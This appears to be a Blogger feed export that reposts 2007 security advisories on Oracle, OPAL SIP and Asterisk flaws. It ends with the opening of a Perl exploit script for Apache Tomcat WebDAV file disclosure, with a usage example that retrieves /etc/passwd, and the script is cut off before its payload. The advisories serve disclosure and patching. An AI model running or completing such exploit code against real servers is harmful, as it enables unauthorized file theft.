/&gt;***********&lt;br /&gt;The Oracle XML DB ftp service contains problems with auditing logins.&lt;/p&gt; &lt;p&gt;Details&lt;br /&gt;*******&lt;br /&gt;When a user attempts to log in via the XDB ftp service the audit trail shows&lt;br /&gt;an incorrect entry for USERID. This can present two subtle problems.&lt;br /&gt;Firstly, if  a user logs in as “SYSTEM” the USERID column only shows “SYSTE”&lt;br /&gt;- only 5 characters. The second problem is that if the same user then&lt;br /&gt;attempts to log in a  user “FOO”, “FOOTE” is logged in the USERID column -&lt;br /&gt;the “TE” coming from the “TE” of “SYSTE[M]” - the previous login. This only&lt;br /&gt;happens on the same  connected TCP circuit; as such all audit entries have&lt;br /&gt;the same SESSIONID.&lt;/p&gt; &lt;p&gt;Fix Information&lt;br /&gt;***************&lt;br /&gt;Oracle was alerted to this flaw on the 9th of March 2006. A patch has now&lt;br /&gt;been made available:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html"&gt;http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html&lt;/a&gt;&lt;/p&gt; &lt;p&gt;NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner&lt;br /&gt;designed specifically for Oracle, can be used to accurately determine&lt;br /&gt;whether your  servers is vulnerable to this flaw. More information about&lt;br /&gt;NGSSQuirreL for Oracle can be found here:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php"&gt;http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php&lt;/a&gt;&lt;/p&gt; &lt;p&gt;About NGSSoftware&lt;br /&gt;*****************&lt;br /&gt;NGSSoftware develops vulnerability assessment and compliancy tools for&lt;br /&gt;database servers including Oracle, Microsoft SQL Server, DB2, Sybase and&lt;br /&gt;Informix.  Headquartered in the United Kingdom NGS has offices in London,&lt;br /&gt;St. Andrews (UK), Brisbane, and Perth (Australia) and seattle in the United&lt;br /&gt;States;  NGSConsulting provide services to some of the largest and most&lt;br /&gt;demanding organizations around the globe.&lt;br /&gt;&lt;a href="http://www.ngssoftware.com/"&gt;http://www.ngssoftware.com/&lt;/a&gt;&lt;br /&gt;Telephone +44 208 401 0070&lt;br /&gt;Fax +44 208 401 0076&lt;br /&gt;&lt;a href="mailto:enquiries@ngssoftware.com"&gt;enquiries@ngssoftware.com&lt;/a&gt; &lt;/p&gt;  &lt;/div&gt;         &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-137432280110114517?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/137432280110114517/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=137432280110114517' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/137432280110114517'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/137432280110114517'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/high-risk-vulnerability-in-oracle-xmldb.html' title='High Risk Vulnerability in Oracle XMLDB FTP Service'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-7666018627835720341</id><published>2008-02-08T06:58:00.001-08:00</published><updated>2008-02-08T06:58:45.922-08:00</updated><title type='text'>High Risk Vulnerability in Oracle TNS Listener</title><content type='html'>Tomado de http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-tns-listener/&lt;br /&gt;&lt;br /&gt;&lt;div id="content"&gt;         &lt;div class="post"&gt;  &lt;h2&gt;&lt;a href="http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-tns-listener/"&gt;High Risk Vulnerability in Oracle TNS Listener&lt;/a&gt;&lt;/h2&gt;  &lt;small&gt;October 17th, 2007&lt;br /&gt;&lt;/small&gt;&lt;br /&gt;      &lt;p&gt;NGSSoftware Insight Security Research Advisory&lt;/p&gt; &lt;p&gt;Name: Oracle TNS Listener DoS and/or remote memory inspection&lt;br /&gt;Systems Affected: Oracle 8.1.7.4, 10g Release 2 and 1, Oracle 9&lt;br /&gt;Severity: High&lt;br /&gt;Vendor URL: &lt;a target="_blank" href="http://www.oracle.com/"&gt;http://www.oracle.com/&lt;/a&gt;&lt;br /&gt;Author: David Litchfield [ &lt;a target="_blank" href="mailto:davidl@ngssoftware.com"&gt;davidl@ngssoftware.com&lt;/a&gt; ]&lt;br /&gt;Reported: 22nd June 2006&lt;br /&gt;Date of Public Advisory: 17th October 2007&lt;br /&gt;Advisory number: #NISR17102007C&lt;/p&gt; &lt;p&gt;Description&lt;br /&gt;***********&lt;br /&gt;The TNS Listener can be crashed by an attacker causing a Denial of Service;&lt;br /&gt;alternatively the attacker can use the same flaw to expose memory contents&lt;br /&gt;remotely. This may reveal sensitive information.&lt;/p&gt; &lt;p&gt;Details&lt;br /&gt;*******&lt;br /&gt;There is a bug in GIOP service that can allow an attacker to crash the TNS&lt;br /&gt;Listener and/or dump memory. A DWORD in the connect GIOP packet is trusted&lt;br /&gt;as the  size of the data in the packet. By setting this to a large value&lt;br /&gt;(e.g. 0×1FFFF) causes the listener to allocate this much memory then attempt&lt;br /&gt;to copy this  much data to it - which eventually leads to a read access&lt;br /&gt;violation because the source data is less than this number and the process&lt;br /&gt;lands in uninitialized  memory. If the attacker uses a smaller number, e.g.&lt;br /&gt;0xFFFF they can dump this many bytes from memory. This may reveal sensitive&lt;br /&gt;information such as the TNS  Listener password.&lt;/p&gt; &lt;p&gt;Fix Information&lt;br /&gt;***************&lt;br /&gt;Oracle was alerted to this flaw on the 22nd of June 2006. A patch has now&lt;br /&gt;been made available:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html"&gt;http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html&lt;/a&gt;&lt;/p&gt; &lt;p&gt;NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner&lt;br /&gt;designed specifically for Oracle, can be used to accurately determine&lt;br /&gt;whether your servers is vulnerable to this flaw. More information about&lt;br /&gt;NGSSQuirreL for Oracle can be found here:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php"&gt;http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php&lt;/a&gt;&lt;/p&gt; &lt;p&gt;About NGSSoftware&lt;br /&gt;*****************&lt;br /&gt;NGSSoftware develops vulnerability assessment and compliancy tools for&lt;br /&gt;database servers including Oracle, Microsoft SQL Server, DB2, Sybase and&lt;br /&gt;Informix.  Headquartered in the United Kingdom NGS has offices in London,&lt;br /&gt;St. Andrews (UK), Brisbane, and Perth (Australia) and seattle in the United&lt;br /&gt;States;  NGSConsulting provide services to some of the largest and most&lt;br /&gt;demanding organizations around the globe.&lt;br /&gt;&lt;a href="http://www.ngssoftware.com/"&gt;http://www.ngssoftware.com/&lt;/a&gt;&lt;br /&gt;Telephone +44 208 401 0070&lt;br /&gt;Fax +44 208 401 0076&lt;br /&gt;&lt;a href="mailto:enquiries@ngssoftware.com"&gt;enquiries@ngssoftware.com&lt;/a&gt; &lt;/p&gt;  &lt;/div&gt;         &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-7666018627835720341?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/7666018627835720341/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=7666018627835720341' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7666018627835720341'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/7666018627835720341'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/high-risk-vulnerability-in-oracle-tns.html' title='High Risk Vulnerability in Oracle TNS Listener'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-2611049925045209498</id><published>2008-02-08T06:55:00.002-08:00</published><updated>2008-02-08T06:57:47.610-08:00</updated><title type='text'>High Risk Vulnerability in Oracle CTX_DOC</title><content type='html'>Tomado de: http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-ctx-doc/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div id="content"&gt;         &lt;div class="post"&gt;  &lt;h2&gt;&lt;a href="http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-ctx-doc/"&gt;High Risk Vulnerability in Oracle CTX_DOC&lt;/a&gt;&lt;/h2&gt;  &lt;small&gt;October 17th, 2007&lt;br /&gt;&lt;/small&gt;&lt;br /&gt;      &lt;p&gt;NGSSoftware Insight Security Research Advisory&lt;/p&gt; &lt;p&gt;Name: Multiple SQL Injection Flaws in Oracle CTX_DOC package&lt;br /&gt;Systems Affected: Oracle 10g release 1 and 2&lt;br /&gt;Severity: High&lt;br /&gt;Vendor URL: &lt;a target="_blank" href="http://www.oracle.com/"&gt;http://www.oracle.com/&lt;/a&gt;&lt;br /&gt;Author: David Litchfield [ &lt;a href="mailto:davidl@ngssoftware.com"&gt;davidl@ngssoftware.com&lt;/a&gt; ]&lt;br /&gt;Reported: 6 June 2005&lt;br /&gt;Date of Public Advisory: 17th October 2007&lt;br /&gt;Advisory number: #NISR17102007A&lt;/p&gt; &lt;p&gt;Description&lt;br /&gt;***********&lt;br /&gt;The Intermedia application in Oracle 10g release 1 and 2 is vulnerable to&lt;br /&gt;SQL injection.&lt;/p&gt; &lt;p&gt;Details&lt;br /&gt;*******&lt;br /&gt;The Intermedia application, owned by CTXSYS, contains a package called&lt;br /&gt;CTX_DOC. This package contains multiple SQL injection flaws. The following&lt;br /&gt;procedures on this package provide vectors for SQL injection attacks:&lt;/p&gt; &lt;p&gt;THEMES&lt;br /&gt;GIST&lt;br /&gt;TOKENS&lt;br /&gt;FILTER&lt;br /&gt;HIGHLIGHT&lt;br /&gt;MARKUP&lt;/p&gt; &lt;p&gt;These can be exploited by a database user; further they can be exploited via&lt;br /&gt;Oracle Application Server by an attacker without a user ID and password&lt;br /&gt;across the Internet.&lt;/p&gt; &lt;p&gt;Fix Information&lt;br /&gt;***************&lt;br /&gt;Oracle was alerted to these flaws on the 6th of June 2005. A patch has now&lt;br /&gt;been made available:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html"&gt;http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html&lt;/a&gt;&lt;/p&gt; &lt;p&gt;NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner&lt;br /&gt;designed specifically for Oracle, can be used to accurately determine&lt;br /&gt;whether your servers are vulnerable to these flaws. More information about&lt;br /&gt;NGSSQuirreL for Oracle can be found here:&lt;/p&gt; &lt;p&gt;&lt;a target="_blank" href="http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php"&gt;http://www.ngssoftware.com/products/database-security/ngs-squirrel-oracle.php&lt;/a&gt;&lt;/p&gt; &lt;p&gt;About NGSSoftware&lt;br /&gt;*****************&lt;br /&gt;NGSSoftware develops vulnerability assessment and compliancy tools for&lt;br /&gt;database servers including Oracle, Microsoft SQL Server, DB2, Sybase and&lt;br /&gt;Informix. Headquartered in the United Kingdom NGS has offices in London, St.&lt;br /&gt;Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United&lt;br /&gt;States; NGSConsulting provide services to some of the largest and most&lt;br /&gt;demanding organizations around the globe.&lt;br /&gt;&lt;a target="_blank" href="http://www.ngssoftware.com/"&gt;http://www.ngssoftware.com/&lt;/a&gt;&lt;br /&gt;Telephone +44 208 401 0070&lt;br /&gt;Fax +44 208 401 0076&lt;br /&gt;&lt;a href="mailto:enquiries@ngssoftware.com"&gt;enquiries@ngssoftware.com&lt;/a&gt; &lt;/p&gt;  &lt;/div&gt;         &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-2611049925045209498?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/2611049925045209498/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=2611049925045209498' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2611049925045209498'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/2611049925045209498'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/high-risk-vulnerability-in-oracle.html' title='High Risk Vulnerability in Oracle CTX_DOC'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-1842844108686994212</id><published>2008-02-08T06:55:00.001-08:00</published><updated>2008-02-08T06:55:50.639-08:00</updated><title type='text'>OPAL SIP Protocol DoS</title><content type='html'>Tomado de: http://www.securiteam.com/unixfocus/6N00C2AK0M.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;table id="ArticleTABLE" style="width: 100%;" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table id="ArticleTitle" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="header" style="font-size: 150%;" width="80%"&gt;OPAL SIP Protocol DoS&lt;/td&gt;           &lt;td class="header" style="text-align: right;"&gt;18 Oct. 2007&lt;/td&gt;          &lt;/tr&gt;         &lt;/tbody&gt;&lt;/table&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt;&lt;br /&gt;&lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Summary&lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;OPAL (Open Phone Abstraction Layer) is "an implementation of various telephony and video communication protocols for use over packet based networks. It's based on code from the OpenH323 project and adds new features such as a stream based architecture, better support for re-use or removal of sub-components, and explicit support for additional protocols". &lt;excerpt&gt;A vulnerability in OPAL allows attackers to cause the framework to crash by sending it a malformed Content-Length value&lt;/excerpt&gt;.&lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt;&lt;br /&gt;&lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;&lt;b&gt;Credit:&lt;/b&gt;&lt;br /&gt;      The information has been provided by &lt;a href="mailto:jesparza%20at%20s21sec.com"&gt;Jose Miguel Esparza&lt;/a&gt;.  &lt;br /&gt; &lt;br /&gt;       &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt;&lt;br /&gt;&lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Details&lt;/td&gt;       &lt;/tr&gt;       &lt;tr align="left"&gt;        &lt;td&gt;   &lt;!-- CC_IMAGE_SELECTION_START --&gt;   &lt;!--   &lt;script type="text/javascript" src="http://apollo.creativecalls.com/ServedByCreativeCalls/AdSelection?campaignName=beyondsecurity"&gt;&lt;/script&gt;   &lt;script type="text/javascript"&gt;    try{    connectionStatus = checkConnectionStatus();    }catch(err){    document.write('&lt;div style="float: right; width: 300px; height: 4em; border: 1px solid #999; margin-left: 1em; margin-bottom: 1em; padding: 1em; text-align: center;"&gt;&lt;a href="http://www.securiteam.com/wssa0205"&gt;Audit your web server for security holes - see what the hackers see.&lt;br /&gt;Sign up for a scan today - risk free!&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;');   }   &lt;/script&gt;   --&gt;   &lt;!-- CC_IMAGE_SELECTION_STOP --&gt;   &lt;div style="border: 1px solid rgb(153, 153, 153); padding: 1em; float: right; width: 300px; height: 4em; margin-left: 1em; margin-bottom: 1em; text-align: center;"&gt;&lt;a href="http://www.securiteam.com/wssa0205"&gt;Audit your web server for security holes - see what the hackers see.&lt;br /&gt;Sign up for a scan today - risk free!&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;      &lt;b&gt;Vulnerable Systems:&lt;/b&gt;&lt;br /&gt;* OPAL version 2.2.8&lt;br /&gt;* Ekiga version 2.0.9&lt;br /&gt;&lt;br /&gt;File:  sippdu.cxx&lt;br /&gt;Function:  SIP_PDU::Read(OpalTransport &amp;amp; transport)&lt;br /&gt;Instruction:  entityBody[contentLength] = '\0';&lt;br /&gt;&lt;br /&gt;An insufficient input validation of the Content-Length field of a SIP request cause the application to crash due to a memory mismanagement.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Workaround:&lt;/b&gt;&lt;br /&gt;A patch in the URL &lt;a href="http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sippdu.cxx?r1=2.83.2.19&amp;amp;r2=2.83.2.20"&gt;http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sippdu.cxx?r1=2.83.2.19&amp;amp;r2=2.83.2.20&lt;/a&gt; is available, but upgrading to new version 2.2.10 is recommended.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-1842844108686994212?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/1842844108686994212/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=1842844108686994212' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/1842844108686994212'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/1842844108686994212'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/opal-sip-protocol-dos.html' title='OPAL SIP Protocol DoS'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-6687293117774610620</id><published>2008-02-08T06:53:00.000-08:00</published><updated>2008-02-08T06:54:32.839-08:00</updated><title type='text'>Asterisk cdr_addon_mysql SQL Injection Vulnerability</title><content type='html'>tomado de : http://downloads.digium.com/pub/security/AST-2007-023.html&lt;br /&gt;&lt;br /&gt;Asterisk Project Security Advisory - AST-2007-023&lt;br /&gt;&lt;br /&gt;Product&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Asterisk-Addons&lt;br /&gt;&lt;br /&gt;Summary&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;SQL Injection Vulnerability in cdr_addon_mysql&lt;br /&gt;&lt;br /&gt;Nature of Advisory&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;SQL Injection&lt;br /&gt;&lt;br /&gt;Susceptibility&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Remote Unauthenticated Sessions&lt;br /&gt;&lt;br /&gt;Severity&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Minor&lt;br /&gt;&lt;br /&gt;Exploits Known&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Yes&lt;br /&gt;&lt;br /&gt;Reported On&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;October 16, 2007&lt;br /&gt;&lt;br /&gt;Reported By&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Humberto Abdelnur &lt;humberto.abdelnur AT loria DOT fr&gt;&lt;br /&gt;&lt;br /&gt;Posted On&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;October 16, 2007&lt;br /&gt;&lt;br /&gt;Last Updated On&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;October 16, 2007&lt;br /&gt;&lt;br /&gt;Advisory Contact&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Tilghman Lesher &lt;tlesher AT digium DOT com&gt;&lt;br /&gt;&lt;br /&gt;CVE Name&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;CVE-2007-5488&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Description&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;The source and destination numbers for a given call are not correctly escaped by the cdr_addon_mysql module when inserting a record. Therefore, a carefully crafted destination number sent to an Asterisk system running cdr_addon_mysql could escape out of a SQL data field and create another query. This vulnerability is made all the more severe if a user were using realtime data, since the data may exist in the same database as the inserted call detail record, thus creating all sorts of possible data corruption and invalidation issues.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Resolution&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;The Asterisk-addons package is not distributed with Asterisk, nor is it installed by default. The module may be either disabled or upgraded to fix this issue.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Affected Versions&lt;br /&gt;&lt;br /&gt;Product&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Release Series&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Asterisk Open Source&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.0.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;All versions&lt;br /&gt;&lt;br /&gt;Asterisk Open Source&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.2.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;All versions prior to asterisk-addons-1.2.8&lt;br /&gt;&lt;br /&gt;Asterisk Open Source&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.4.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;All versions prior to asterisk-addons-1.4.4&lt;br /&gt;&lt;br /&gt;Asterisk Business Edition&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;A.x.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;Asterisk Business Edition&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;B.x.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;AsteriskNOW&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;pre-release&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;Asterisk Appliance Developer Kit&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;0.x.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;s800i (Asterisk Appliance)&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.0.x&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Unaffected&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Corrected In&lt;br /&gt;&lt;br /&gt;Product&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Release&lt;br /&gt;&lt;br /&gt;Asterisk-Addons&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.2.8&lt;br /&gt;&lt;br /&gt;Asterisk-Addons&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;1.4.4&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Links&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Asterisk Project Security Advisories are posted at http://www.asterisk.org/security.&lt;br /&gt;&lt;br /&gt;This document may be superseded by later versions; if so, the latest version will be posted at http://downloads.digium.com/pub/security/AST-2007-023.pdf and http://downloads.digium.com/pub/security/AST-2007-023.html.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Revision History&lt;br /&gt;&lt;br /&gt;Date&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Editor&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Revisions Made&lt;br /&gt;&lt;br /&gt;2007-10-16&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Tilghman Lesher&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Initial release&lt;br /&gt;&lt;br /&gt;2007-10-16&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Tilghman Lesher&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Added CVE number&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Asterisk Project Security Advisory - 2007-AST-023&lt;br /&gt;Copyright © 2007 Digium, Inc. All Rights Reserved.&lt;br /&gt;Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-6687293117774610620?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/6687293117774610620/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=6687293117774610620' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6687293117774610620'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6687293117774610620'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2008/02/asterisk-cdraddonmysql-sql-injection.html' title='Asterisk cdr_addon_mysql SQL Injection Vulnerability'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4755801140345275851</id><published>2008-02-08T06:51:00.000-08:00</published><updated>2008-02-08T06:53:19.699-08:00</updated><title type='text'>Apache Tomcat Remote File Disclosure Zeroday Xploit</title><content type='html'>tomado :http://www.milw0rm.com/exploits/4530&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#******************************************************&lt;br /&gt;# Apache Tomcat Remote File Disclosure Zeroday Xploit&lt;br /&gt;# kcdarookie aka eliteb0y / 2007&lt;br /&gt;#&lt;br /&gt;# thanx to the whole team &amp; andi :)&lt;br /&gt;# +++KEEP PRIV8+++&lt;br /&gt;#&lt;br /&gt;# This Bug may reside in different WebDav implementations,&lt;br /&gt;# Warp your mind!&lt;br /&gt;# +You will need auth for the exploit to work...&lt;br /&gt;#******************************************************&lt;br /&gt;&lt;br /&gt;use IO::Socket;&lt;br /&gt;use MIME::Base64; ### FIXME! Maybe support other auths too ?&lt;br /&gt;&lt;br /&gt;# SET REMOTE PORT HERE&lt;br /&gt;$remoteport = 8080;&lt;br /&gt;&lt;br /&gt;sub usage {&lt;br /&gt; print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";&lt;br /&gt; print "kcdarookie aka eliteb0y / 2007\n";&lt;br /&gt; print "usage: perl TOMCATXPL &lt;remotehost&gt; &lt;webdav file&gt; &lt;file to retrieve&gt; [username] [password]\n";&lt;br /&gt; print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;if ($#ARGV &lt; 2) {usage();}&lt;br /&gt;&lt;br /&gt;$hostname = $ARGV[0];&lt;br /&gt;$webdavfile = $ARGV[1];&lt;br /&gt;$remotefile = $ARGV[2];&lt;br /&gt;&lt;br /&gt;$username = $ARGV[3];&lt;br /&gt;$password = $ARGV[4];&lt;br /&gt;&lt;br /&gt;my $sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; $hostname,&lt;br /&gt;                              PeerPort =&gt; $remoteport,&lt;br /&gt;                              Proto    =&gt; 'tcp');&lt;br /&gt;                              &lt;br /&gt;$|=1;&lt;br /&gt;$BasicAuth = encode_base64("$username:$password");&lt;br /&gt;&lt;br /&gt;$KRADXmL = &lt;br /&gt;"&lt;?xml 